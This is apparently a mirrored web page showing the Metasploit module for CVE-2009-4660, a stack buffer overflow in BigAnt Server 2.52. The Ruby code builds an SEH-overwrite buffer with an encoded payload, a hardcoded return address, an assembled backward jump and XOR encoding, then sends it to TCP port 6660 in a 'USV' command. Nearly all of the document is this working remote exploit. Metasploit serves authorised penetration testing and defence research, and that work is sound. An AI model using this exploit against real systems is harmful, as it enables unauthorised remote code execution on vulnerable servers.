Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/bigant_server_usv.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'BigAnt Server 2.52 USV Buffer Overflow',
17
'Description' => %q{
18
This exploits a stack buffer overflow in the BigAnt Messaging Service,
19
part of the BigAnt Server product suite. This module was tested
20
successfully against version 2.52.
21
22
NOTE: The AntServer service does not restart, you only get one shot.
23
},
24
'Author' => [
25
'Lincoln',
26
'DouBle_Zer0',
27
'jduck'
28
],
29
'License' => MSF_LICENSE,
30
'References' => [
31
[ 'CVE', '2009-4660' ],
32
[ 'OSVDB', '61386' ],
33
[ 'EDB', '10765' ],
34
[ 'EDB', '10973' ]
35
],
36
'Privileged' => true,
37
'DefaultOptions' => {
38
'EXITFUNC' => 'seh',
39
},
40
'Payload' => {
41
'Space' => (218 + 709 + 35),
42
'BadChars' => "\x2a\x20\x27\x0a\x0f",
43
# pre-xor with 0x2a:
44
# 'BadChars' => "\x00\x0a\x0d\x20\x25",
45
'StackAdjustment' => -3500,
46
},
47
'Platform' => 'win',
48
'Targets' => [
49
[ 'BigAnt 2.52 Universal', { 'Ret' => 0x1b019fd6 } ], # Tested OK (jduck) p/p/r msjet40.dll xpsp3
50
],
51
'DefaultTarget' => 0,
52
'DisclosureDate' => '2009-12-29',
53
'Notes' => {
54
'Reliability' => UNKNOWN_RELIABILITY,
55
'Stability' => UNKNOWN_STABILITY,
56
'SideEffects' => UNKNOWN_SIDE_EFFECTS
57
}
58
)
59
)
60
61
register_options([Opt::RPORT(6660)])
62
end
63
64
def exploit
65
connect
66
67
sploit = ""
68
sploit << payload.encoded
69
sploit << generate_seh_record(target.ret)
70
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + payload_space.to_s).encode_string
71
sploit << rand_text_alphanumeric(3)
72
sploit << [0xdeadbeef].pack('V') * 3
73
74
# the buffer gets xor'd with 0x2a !
75
sploit = sploit.unpack("C*").map { |c| c ^ 0x2a }.pack("C*")
76
77
print_status("Trying target #{target.name}...")
78
sock.put("USV " + sploit + "\r\n\r\n")
79
80
handler
81
disconnect
82
end
83
end
84
85